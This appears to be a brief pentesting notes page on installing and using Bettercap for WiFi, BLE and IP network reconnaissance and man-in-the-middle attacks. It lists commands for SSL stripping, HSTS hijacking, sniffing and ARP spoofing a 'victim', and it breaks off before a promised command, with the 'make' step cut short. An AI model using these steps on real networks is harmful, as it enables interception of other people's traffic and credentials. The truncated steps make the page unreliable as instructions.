Bettercap

The Swiss Army knife for WiFiarrow-up-right, Bluetooth Low Energyarrow-up-right, wireless HID hijackingarrow-up-right and IPv4 and IPv6arrow-up-right networks reconnaissance and MITM attacks.

Install

sudo apt update
sudo apt install golang git build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
git clone https://github.com/bettercap/bettercap
cd bettercap
make buil

Usage

sudo bettercap -iface eth0        // Without GUI
sudo bettercap -caplet http-ui    // With GUI
set http.proxy.sslstrip true
hstshijack/hstshijack  //For the HSTS connections

net.probe on
net.sniff on

set arp.spoof.targets OUR_TARGETS
arp.spoof on

Don't forget to run this on your console to not kill your victim internet connection:

Last updated